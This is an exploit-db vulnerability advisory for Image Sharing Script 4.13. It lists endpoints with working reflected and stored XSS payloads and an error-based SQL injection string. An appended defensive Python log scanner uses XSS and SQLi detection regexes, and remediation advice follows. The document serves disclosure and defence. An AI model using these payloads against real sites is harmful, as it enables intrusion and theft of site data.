Image Sharing Script 4.13 – Multiple Vulnerabilities

  • Author: Hasan Emre Ozer
    Date: 2017-01-16
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/41080/
  • Exploit Title : Image Sharing Script v4.13 - Multiple Vulnerability
    Author : Hasan Emre Ozer
    Google Dork :-
    Date : 16/01/2017
    Type : webapps
    Platform: PHP
    Vendor Homepage : http://itechscripts.com/image-sharing-script/
    Software Price and Demo : $1250
    http://photo-sharing.itechscripts.com/
    
    --------------------------------
    Type: Reflected XSS
    Vulnerable URL: http://localhost/[PATH]/searchpin.php
    Vulnerable Parameters : q=
    Payload:"><img src=i onerror=prompt(1)>
    -------------------------------
    Type: Error-Based SQL Injection
    Vulnerable URL:http://localhost/[PATH]/list_temp_photo_pin_upload.php
    Vulnerable Parameters: pid
    Method: GET
    Payload: ' AND (SELECT 2674 FROM(SELECT
    COUNT(*),CONCAT(0x717a717671,(SELECT
    (ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
    INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
    -------------------------------
    Type: Error-Based SQL Injection
    Vulnerable URL:http://localhost/[PATH]/categorypage.php
    Vulnerable Parameters: token
    Method: GET
    Payload: ' AND (SELECT 2674 FROM(SELECT
    COUNT(*),CONCAT(0x717a717671,(SELECT
    (ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
    INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
    
    --------------------------------
    Type: Reflected XSS
    Vulnerable URL: http://localhost/[PATH]/categorypage.php
    Vulnerable Parameters : token
    Payload:"><img src=i onerror=prompt(1)>
    
    -------------------------------
    Type: Stored XSS
    Vulnerable URL: http://localhost/[PATH]/ajax-files/postComment.php
    Method: POST
    Vulnerable Parameters : &text=
    Payload:<img src=i onerror=prompt(1)>
    --------------------------------
    Type: Error-Based SQL Injection
    Vulnerable URL:http://localhost/[PATH]/ajax-files/postComment.php
    Vulnerable Parameters: id
    Method: POST
    Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
    (ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
    INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
    ---------------------------------
    Type: Error-Based SQL Injection
    Vulnerable URL:http://localhost/[PATH]//ajax-files/followBoard.php
    Vulnerable Parameters: brdId
    Method: POST
    Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
    (ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
    INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
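
Added example (not part of the original advisory): a Python log-triage sketch for defenders that flags requests to the endpoints and parameters listed above when a value carries markup with event handlers or SQL constructs. The regex heuristics, the combined log format and the sample lines are assumptions constructed for illustration; POST parameters can be checked through `classify()` if the body is captured by a WAF or application log.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoints and parameters as listed in the advisory.
WATCHED = {
    "searchpin.php": {"q"},
    "categorypage.php": {"token"},
    "list_temp_photo_pin_upload.php": {"pid"},
    "ajax-files/postComment.php": {"text", "id"},
    "ajax-files/followBoard.php": {"brdId"},
}
# Assumed heuristics: tag with an event handler / script tag, and SQL subquery markers.
XSS_RE = re.compile(r"<\s*\w+[^>]*\bon\w+\s*=|<\s*script", re.I)
SQLI_RE = re.compile(r"\bselect\b.*\bfrom\b|information_schema|\brand\s*\(", re.I)
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(path, params):
    """Return sorted (parameter, kind) findings; params maps name -> list of values."""
    endpoint = next((e for e in WATCHED if path.endswith("/" + e)), None)
    findings = set()
    for name in WATCHED.get(endpoint, ()):
        for value in params.get(name, []):
            if XSS_RE.search(value):
                findings.add((name, "xss"))
            if SQLI_RE.search(value):
                findings.add((name, "sqli"))
    return sorted(findings)

def scan_access_log(lines):
    """Return (line_no, path, findings) for each request line with a suspicious query."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if m:
            url = urlsplit(m.group(1))
            found = classify(url.path, parse_qs(url.query))  # parse_qs percent-decodes
            if found:
                hits.append((no, url.path, found))
    return hits

SAMPLE_LOG = [  # constructed lines, not taken from a real server
    '203.0.113.5 - - [16/Jan/2017:10:00:00 +0000] "GET /photo/searchpin.php?q=sunset HTTP/1.1" 200 5120',
    '203.0.113.9 - - [16/Jan/2017:10:00:02 +0000] "GET /photo/searchpin.php?q=%22%3E%3Cimg%20src%3Di%20onerror%3Dprompt(1)%3E HTTP/1.1" 200 5301',
    '203.0.113.9 - - [16/Jan/2017:10:00:05 +0000] "GET /photo/categorypage.php?token=%27%20AND%20(SELECT%20COUNT(*)%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS)%20AND%20%271%27%3D%271 HTTP/1.1" 200 412',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

Matches are triage leads rather than proof of compromise; the fix on the application side is parameterized queries for the listed parameters and output encoding wherever `q`, `token` and comment text are rendered.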